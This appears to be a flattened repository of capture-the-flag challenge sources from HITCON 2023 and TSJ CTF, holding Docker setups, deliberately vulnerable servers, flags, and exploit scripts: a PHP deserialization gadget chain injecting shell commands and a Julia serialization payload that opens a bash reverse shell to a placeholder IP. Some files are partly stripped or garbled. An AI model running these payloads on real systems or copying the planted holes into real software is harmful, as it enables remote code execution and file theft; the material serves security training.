    "http-proxy-middleware": "^2.0.6"
  }
}
--------------------------------------------------------------------------------
/hitcon-quals/2023/misc-amf/service/Dockerfile:
--------------------------------------------------------------------------------
FROM python:slim

# Py3AMF is unpinned: the gateway's behaviour (including how the authenticator
# is applied) is whatever version happens to install at build time.
RUN pip install Py3AMF

COPY server.py /app/server.py

EXPOSE 5000
CMD ["python", "/app/server.py"]
--------------------------------------------------------------------------------
/hitcon-quals/2023/misc-amf/service/server.py:
--------------------------------------------------------------------------------
from pyamf.remoting.gateway.wsgi import WSGIGateway
import secrets

# Fresh random credentials per process. Nothing in this file prints or stores
# them, so no legitimate client can ever authenticate; the intended route is
# presumably to get past the authenticator rather than to learn the password.
ADMIN_USER = secrets.token_urlsafe(16)
ADMIN_PASS = secrets.token_urlsafe(16)


class FileManagerService:
    """File access exposed over AMF as the "file_manager" service.

    Neither method restricts its path argument, so any call that gets past
    ``auth`` can read or list anything the process user can.
    """

    def read(self, filename: str) -> bytes:
        # Arbitrary-path read; no base directory, no symlink check.
        with open(filename, "rb") as f:
            return f.read()

    def list(self, path: str = "/") -> list[str]:
        import os

        return os.listdir(path)


def auth(username: str, password: str) -> bool:
    """Gateway authenticator: plain ``==`` against the random admin credentials.

    Returns True only for the exact (ADMIN_USER, ADMIN_PASS) pair.
    """
    if username == ADMIN_USER and password == ADMIN_PASS:
        return True

    return False


# NOTE(review): how Py3AMF applies `authenticator` (per request, per target,
# and what an unauthenticated call gets) is version-dependent - see the
# unpinned install in the Dockerfile.
gateway = WSGIGateway({"file_manager": FileManagerService}, authenticator=auth)


if __name__ == "__main__":
    from wsgiref import simple_server

    host = "0.0.0.0"
    port = 5000

    # wsgiref's single-threaded reference server, bound on all interfaces
    # (the Dockerfile EXPOSEs 5000).
    httpd = simple_server.WSGIServer((host, port), simple_server.WSGIRequestHandler)
    httpd.set_app(gateway)

    print("Running Authentication AMF gateway on http://%s:%d" % (host, port))

    try:
        httpd.serve_forever()
    except KeyboardInterrupt:
        pass
--------------------------------------------------------------------------------
/hitcon-quals/2023/web-sharer/app/Dockerfile:
--------------------------------------------------------------------------------
FROM node:20

WORKDIR /app

COPY ./ /app

RUN yarn install

CMD ["node", "app.js"]

--------------------------------------------------------------------------------
/hitcon-quals/2023/web-sharer/app/package.json:
--------------------------------------------------------------------------------
{
  "dependencies": {
    "body-parser": "^1.20.2",
    "mustache-express": "^1.3.2",
    "express": "^4.18.2",
    "formidable": "^3.5.1",
    "uuid": "^9.0.0"
  }
}
--------------------------------------------------------------------------------
/hitcon-quals/2023/web-sharer/app/uploads/.gitkeep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/hitcon-quals/2023/web-sharer/app/uploads/.gitkeep
-------------------------------------------------------------------------------- /hitcon-quals/2023/web-sharer/app/views/index.mustache: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Sharer 7 | 8 | 9 | 10 |

Sharer

11 |

Upload your files here

12 | {{#message}} 13 |

{{message}}

14 | {{/message}} 15 |
16 | 17 | 18 |
19 | 20 | 21 | -------------------------------------------------------------------------------- /hitcon-quals/2023/web-sharer/app/views/preview.mustache: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | {{ name }} - Sharer 9 | 10 | 11 | 12 |
13 |

Preview - {{ name }}

14 |

Download

15 | 16 |
17 | 18 | 19 | -------------------------------------------------------------------------------- /hitcon-quals/2023/web-sharer/app/views/report.mustache: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | Report 9 | 10 | 11 | 12 |
13 |

Report

14 | {{#message}} 15 |

{{message}}

16 | {{/message}} 17 |
18 | 19 | 20 | 21 | 22 | 23 |

24 |
25 |
26 | 27 | 28 | -------------------------------------------------------------------------------- /hitcon-quals/2023/web-sharer/bot/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM node:20 2 | 3 | WORKDIR /app 4 | 5 | RUN apt-get update && apt-get install -y chromium 6 | 7 | ENV PUPPETEER_SKIP_CHROMIUM_DOWNLOAD=true 8 | ENV PUPPETEER_EXECUTABLE_PATH=/usr/bin/chromium 9 | 10 | COPY ./ /app 11 | 12 | RUN yarn add puppeteer express 13 | 14 | CMD ["node", "index.js"] 15 | 16 | -------------------------------------------------------------------------------- /hitcon-quals/2023/web-sharer/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | admin-bot.sharer.world: 5 | build: ./bot 6 | restart: always 7 | environment: 8 | - NODE_ENV=production 9 | - PORT=443 10 | - BOT_HOST=admin-bot.sharer.world 11 | - APP_HOST=sharer.world 12 | - SCOREBOARD_URL=http://censored 13 | - FLAG=hitcon{fake} 14 | 15 | volumes: 16 | - /etc/letsencrypt/live/sharer.world/fullchain.pem:/opt/certificates/fullchain.pem 17 | - /etc/letsencrypt/live/sharer.world/privkey.pem:/opt/certificates/privkey.pem # not provided 18 | 19 | sharer.world: 20 | build: ./app 21 | restart: always 22 | ports: 23 | - "443:443" 24 | environment: 25 | - NODE_ENV=production 26 | - PORT=443 27 | - BOT_HOST=admin-bot.sharer.world 28 | 29 | volumes: 30 | - /etc/letsencrypt/live/sharer.world/fullchain.pem:/opt/certificates/fullchain.pem 31 | - /etc/letsencrypt/live/sharer.world/privkey.pem:/opt/certificates/privkey.pem # not provided 32 | 33 | depends_on: 34 | - admin-bot.sharer.world 35 | -------------------------------------------------------------------------------- /tsj-ctf/avatar/docker/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM php:8-apache 2 | 3 | RUN pecl install redis && docker-php-ext-enable redis 4 | RUN apt update && apt 
install -y libzip-dev && docker-php-ext-install pdo pdo_mysql zip

COPY ./src/ /var/www/

RUN curl -sS https://getcomposer.org/installer | php -- --install-dir=/usr/local/bin --filename=composer
RUN cd /var/www/ && composer install

# sticky + world-writable but not listable by other users
RUN chmod 1733 /tmp

# /flag is root-only (0400); the setuid-root readflag binary is the only
# intended way for the web user to read it.
COPY ./flag/readflag.c /readflag.c
COPY ./flag/flag /flag
RUN chmod 0400 /flag && chown root:root /flag
RUN chmod 0444 /readflag.c && gcc /readflag.c -o /readflag
RUN chown root:root /readflag && chmod 4555 /readflag
--------------------------------------------------------------------------------
/tsj-ctf/avatar/docker/docker-compose.yml:
--------------------------------------------------------------------------------
version: '3.5'

services:

  redis:
    image: redis:alpine
    restart: always
    volumes:
      - ./files/redis.conf:/usr/local/etc/redis/redis.conf:ro
    command: redis-server /usr/local/etc/redis/redis.conf

  database:
    image: mariadb:10
    restart: always
    volumes:
      - ./files/init.sql:/docker-entrypoint-initdb.d/init.sql:ro
    environment:
      - MYSQL_RANDOM_ROOT_PASSWORD=1
      - MYSQL_USER=user
      # hard-coded application DB password, checked into the repo
      - MYSQL_PASSWORD=p@55w0rd
      - MYSQL_DATABASE=db

  web:
    build: ./
    volumes:
      - ./files/php.ini:/usr/local/etc/php/conf.d/custom.ini:ro
    ports:
      - 10004:80/tcp
    depends_on:
      - redis
      - database
--------------------------------------------------------------------------------
/tsj-ctf/avatar/docker/files/init.sql:
--------------------------------------------------------------------------------
-- Single users table. `password` is stored in plaintext and compared verbatim
-- by include.php (`$_POST['password'] !== $result['password']`). There is no
-- UNIQUE constraint on `username`; uniqueness rests solely on include.php's
-- lookup-then-insert auto-registration.
CREATE TABLE IF NOT EXISTS `users` (
  `id` INT NOT NULL AUTO_INCREMENT,
  `username` TEXT NULL DEFAULT NULL,
  `password` TEXT NULL DEFAULT NULL,
  `avatar` BLOB NULL DEFAULT NULL,
  PRIMARY KEY (`id`)
);
--------------------------------------------------------------------------------
/tsj-ctf/avatar/docker/files/php.ini:
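--------------------------------------------------------------------------------
session.save_handler = redis
session.save_path = "tcp://redis:6379?weight=1&?timeout=3"
--------------------------------------------------------------------------------
/tsj-ctf/avatar/docker/flag/flag:
--------------------------------------------------------------------------------
TSJ{byp4ss_redis_s3cur1ty_ch3ck_4nd_pwn}
--------------------------------------------------------------------------------
/tsj-ctf/avatar/docker/flag/readflag.c:
--------------------------------------------------------------------------------
#include <stdio.h>
/* string.h / unistd.h added: strcmp() and seteuid() were used without prototypes. */
#include <string.h>
#include <unistd.h>

/*
 * setuid-root helper (installed root:root, mode 4555 by the Dockerfile) that
 * prints /flag (root-only, 0400) when invoked as `readflag give me the flag`.
 *
 * Returns 0 on success, 1 on bad usage, wrong words, or I/O failure.
 */
int main(int argc, char *argv[]) {
    /* Become root for the real uid too, not just the effective one, before
     * opening the flag. */
    seteuid(0);
    setegid(0);
    setuid(0);
    setgid(0);

    if(argc < 5) {
        printf("Usage: %s give me the flag\n", argv[0]);
        return 1;
    }

    /* OR of the four strcmp() results is zero only if every word matches. */
    if ((strcmp(argv[1], "give") | strcmp(argv[2], "me") | strcmp(argv[3], "the") | strcmp(argv[4], "flag")) != 0) {
        puts("You are not worthy");
        return 1;
    }

    char flag[256] = { 0 };
    FILE* fp = fopen("/flag", "r");
    if (!fp) {
        perror("fopen");
        return 1;
    }
    /* Read at most sizeof(flag)-1 bytes so a terminator always fits: the old
     * fread(flag, 1, 256, fp) could fill the whole buffer with no NUL, and
     * puts() would then run past the end of it. */
    size_t n = fread(flag, 1, sizeof(flag) - 1, fp);
    /* fread() returns size_t, so the previous `< 0` check could never fire;
     * test ferror() for a genuine read error instead. */
    if (n == 0 && ferror(fp)) {
        perror("fread");
        fclose(fp);
        return 1;
    }
    flag[n] = '\0';
    puts(flag);
    fclose(fp);
    return 0;
}
--------------------------------------------------------------------------------
/tsj-ctf/avatar/docker/src/composer.json:
--------------------------------------------------------------------------------
{
    "require": {
        "envms/fluentpdo": "2.2.4"
    }
}
--------------------------------------------------------------------------------
/tsj-ctf/avatar/docker/src/html/include.php:
--------------------------------------------------------------------------------
alert("Username or password is too short (min 8 characters)"); location.href = "/";');
}

$result = $fluent->from('users')->select('username, password')->where('username', $_POST['username'])->fetch();
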
| if ($result === false) { 12 | // Auto-register 13 | $fluent->insertInto('users', [ 14 | 'username' => $_POST['username'], 15 | 'password' => $_POST['password'], 16 | ])->execute(); 17 | } else if ($_POST['password'] !== $result['password']) { 18 | die(''); 19 | } 20 | $_SESSION['username'] = $_POST['username']; 21 | header('Location: /'); 22 | } 23 | ?> 24 | -------------------------------------------------------------------------------- /tsj-ctf/avatar/docker/src/html/static/images/default.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/tsj-ctf/avatar/docker/src/html/static/images/default.jpeg -------------------------------------------------------------------------------- /tsj-ctf/avatar/docker/src/html/static/style.css: -------------------------------------------------------------------------------- 1 | @import url("https://fonts.googleapis.com/css2?family=Inconsolata:wght@500&display=swap"); 2 | 3 | body { 4 | width: 100%; 5 | max-width: 40rem; 6 | margin: 1rem auto; 7 | font-family: "Inconsolata", "Consolas", monospace; 8 | } 9 | 10 | main { 11 | margin-top: 0.75rem; 12 | } 13 | 14 | h1, 15 | h2 { 16 | margin: 0; 17 | } 18 | 19 | input[type="text"], input[type="password"] { 20 | padding: 0.25rem; 21 | } 22 | 23 | .avatar { 24 | border-radius: 50%; 25 | } 26 | 27 | .container { 28 | text-align: center; 29 | margin: 5rem; 30 | } 31 | 32 | /* tabs */ 33 | nav > a { 34 | background-color: #777; 35 | border-radius: 5px 5px 0 0; 36 | color: white; 37 | padding: 0.3em; 38 | text-decoration: none; 39 | } 40 | .content { 41 | border: 1px solid lightgray; 42 | display: none; 43 | padding: 32px; 44 | margin-top: 0.3em; 45 | } 46 | .content:target { 47 | display: block; 48 | } 49 | 50 | input[type="file"], 51 | input[type="url"] { 52 | width: 75%; 53 | } 54 | input[type="submit"] { 55 | width: 15%; 56 | } 57 | 
-------------------------------------------------------------------------------- /tsj-ctf/avatar/exploit/gadgets.php: -------------------------------------------------------------------------------- 1 | structure = new Structure(); 19 | } 20 | } 21 | } 22 | 23 | namespace Envms\FluentPDO\Queries { 24 | use Envms\FluentPDO\{Query, Regex}; 25 | class Select 26 | { 27 | protected $fluent; 28 | protected $regex; 29 | protected $statements = []; 30 | function __construct(string $command='ls -al') 31 | { 32 | $this->fluent = new Query(); 33 | $this->regex = new Regex(); 34 | 35 | $this->statements['GROUP BY'] = ['a:b']; 36 | $this->statements['FROM'] = $command; // argument 37 | } 38 | } 39 | } 40 | -------------------------------------------------------------------------------- /tsj-ctf/avatar/exploit/gen_serialized.php: -------------------------------------------------------------------------------- 1 | /dev/null)" == "" ]; then 8 | docker build -t service:latest ./service 9 | fi 10 | 11 | /usr/bin/node ./server.js 12 | -------------------------------------------------------------------------------- /tsj-ctf/genie/deploy/flag.txt: -------------------------------------------------------------------------------- 1 | TSJ{who_cares_about_padding?!} 2 | -------------------------------------------------------------------------------- /tsj-ctf/genie/deploy/service/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM julia:1.7.2-bullseye 2 | 3 | RUN apt-get update && apt-get install nginx apache2-utils -y && rm -rf /var/lib/apt/lists/* 4 | 5 | RUN useradd -ms /bin/bash web 6 | 7 | USER web 8 | RUN julia -e 'import Pkg;Pkg.add(Pkg.PackageSpec(;name="Genie", version="4.14.0"))' 9 | 10 | USER root 11 | RUN mkdir /app 12 | WORKDIR /app 13 | RUN mkdir uploads sessions 14 | COPY main.jl . 15 | COPY flag.txt . 
16 | RUN mv flag.txt flag-$(md5sum flag.txt | cut -d ' ' -f 1 | tr -d '\n').txt 17 | 18 | COPY default.conf /etc/nginx/sites-available/default 19 | COPY start.sh . 20 | 21 | RUN chown -R web:web . 22 | 23 | CMD ["timeout", "600", "./start.sh"] 24 | -------------------------------------------------------------------------------- /tsj-ctf/genie/deploy/service/default.conf: -------------------------------------------------------------------------------- 1 | server { 2 | listen 3000 default_server; 3 | listen [::]:3000 default_server; 4 | access_log stdout; 5 | error_log stderr; 6 | client_max_body_size 128k; 7 | 8 | location / { 9 | auth_basic "CTF Challenge"; 10 | auth_basic_user_file /app/htpasswd; 11 | proxy_pass http://localhost:8888/; 12 | } 13 | } 14 | -------------------------------------------------------------------------------- /tsj-ctf/genie/deploy/service/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.7' 2 | services: 3 | web: 4 | build: . 
5 | init: true 6 | ports: 7 | - 8888:3000 8 | environment: 9 | - USERNAME=user 10 | - PASSWORD=pass 11 | -------------------------------------------------------------------------------- /tsj-ctf/genie/deploy/service/flag.txt: -------------------------------------------------------------------------------- 1 | TSJ{who_cares_about_padding?!} 2 | -------------------------------------------------------------------------------- /tsj-ctf/genie/deploy/service/start.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | printf "$PASSWORD" | htpasswd -i -c htpasswd "$USERNAME" 3 | nginx & 4 | su web -c 'julia main.jl' 5 | -------------------------------------------------------------------------------- /tsj-ctf/genie/deploy/start.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | printf "$PASSWORD" | htpasswd -i -c htpasswd "$USERNAME" 3 | nginx & 4 | su web -c 'julia main.jl' 5 | -------------------------------------------------------------------------------- /tsj-ctf/genie/exploit/gen_session.jl: -------------------------------------------------------------------------------- 1 | using Serialization 2 | Serialization.deserialize(s::Serializer, t::Type{BigInt}) = run(`bash -c '/bin/bash -i >& /dev/tcp/IP/PORT 0>&1'`) 3 | filt = filter(methods(Serialization.deserialize).ms) do m 4 | occursin("BigInt", repr(m)) 5 | end 6 | Serialization.serialize("exp", (filt[1], BigInt(48763))) 7 | -------------------------------------------------------------------------------- /tsj-ctf/welcome-to-tsj-ctf/screenshot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/tsj-ctf/welcome-to-tsj-ctf/screenshot.png -------------------------------------------------------------------------------- /tsj-ctf/welcome-to-tsj-ctf/www.zip: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/tsj-ctf/welcome-to-tsj-ctf/www.zip --------------------------------------------------------------------------------